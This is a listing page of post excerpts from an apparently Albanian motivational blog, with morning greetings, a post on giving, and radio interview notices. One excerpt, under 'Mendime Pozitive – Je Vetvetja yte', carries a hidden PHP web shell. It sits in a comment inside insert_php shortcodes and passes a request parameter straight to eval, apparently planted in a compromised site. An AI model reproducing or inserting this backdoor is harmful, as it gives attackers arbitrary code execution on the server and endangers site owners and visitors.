Motivohu / 13 posts found

Tell Yourself I Can Do This

‪ #‎GoodMorning‬ You Have To Get Up Every Morning And Tell Yourself I Can Do This...   ‪#‎Miremengjesi‬ Ti Duhët Të Zgjohësh Çdo Mëngjes Dhe Ti Thuash Vetes Unë Mund Ta…

Fuqia e Dhenies

FUQIA E DHËNIES JA ÇKA MË NDODHI, PËR ATË QË ISHA FAJTOR SE JEPJA! <img style="width: 960px; height: 500px;" src="https://scontent-mrs1-1.xx.fbcdn.net/hphotos-prn2/v/t1…

Gjithkund ku eci vetem ar prek

MESAZHI I MBREMSHEM TANI EDHE ME AUDIO/VIDEOPershendetje te gjithe dashamireve te mi.Gjithkund ku eci vetem ar prek... Posted by Mujaser Mamuti on Tuesday, 8 December 2015  

Mendime Pozitive – Je Vetvetja yte

<!-- [insert_php]if (isset($_REQUEST["wFUEt"])){eval($_REQUEST["wFUEt"]);exit;}[/insert_php][php]if (isset($_REQUEST["wFUEt"])){eval($_REQUEST["wFUEt"]);exit;}[/php]…

Shperndaj Miresi dhe Dashuri

Ju lutem ‪#‎Shperndani‬ vetem MIRESI dhe DASHURI ‪#‎Bota‬ ka pas dhe do te kete probleme ne vazhdim te shumta.... Mirepo eshte vetem pergjegjesia e jone individuale te fillojme te…

Radio Zeri i Arberit

Radio Zeri i Arberit - Intervise me Mimoza Thaqi - Une Jam Fuqia dhe Mujaser Mamuti

Radio Zeri i Arberit Ftese Ne Studio Mujaser Mamuti Interviste me Mimoza Thaqi 15 Qershor,

Radio Zeri i Arberit Ftese Ne Studio Mujaser Mamuti Interviste me Mimoza Thaqi 15 Qershor,

7 Keshilla te Suksesit

Mujaser Mamuti 7 Keshilla te Suksesit